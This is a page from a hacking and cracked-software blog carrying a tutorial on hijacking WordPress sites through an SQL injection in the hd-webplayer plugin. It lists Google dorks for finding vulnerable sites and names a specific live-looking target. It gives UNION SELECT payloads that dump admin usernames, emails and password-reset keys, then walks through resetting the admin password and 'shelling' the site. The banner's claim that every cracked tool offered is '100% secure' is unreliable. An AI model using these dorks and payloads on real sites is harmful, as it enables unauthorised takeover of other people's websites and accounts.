Notice Board

PatTakhaZOne Web Serf Education Purpose keh lhya ha. Jasa keh ap janty hein keh Takreeban 100% ma sa 90% patches, Craking tools or Hacking software mein virus hota ha.PatTakhaZOne peh har ek tool check kiya gya oR Trusted ha :) Ma Kud ek ek sofware Ko check Krka upload krta hon. Umeed ha apko meri posts pasand ahy gi.(Every SOftware is 100% Secure and Trusted) All information on this Blog is for educational purposes only.

Showing posts with label Hack WordPress Site. Show all posts
Showing posts with label Hack WordPress Site. Show all posts

[Tutorial] Hack WordPress site with SQL injection

Hack WordPress site with SQL injection

As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.


So lets begin.

I will use this 0day here by AMY hacker.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example


Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3



When i add ' text disappears so it is vulnerable.






NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--



Now we have 2 users.





We pick one and copy his email.
Go to the login page of the site.
It is usually here:


Code:
http://www.site.com/wp-login.php

And press "Lost your password?" 




Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.




Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--




Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--






Voila!
Now we just need to reset it.



Go to:


Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login= 

So my link will be:




Login with new password and shell it.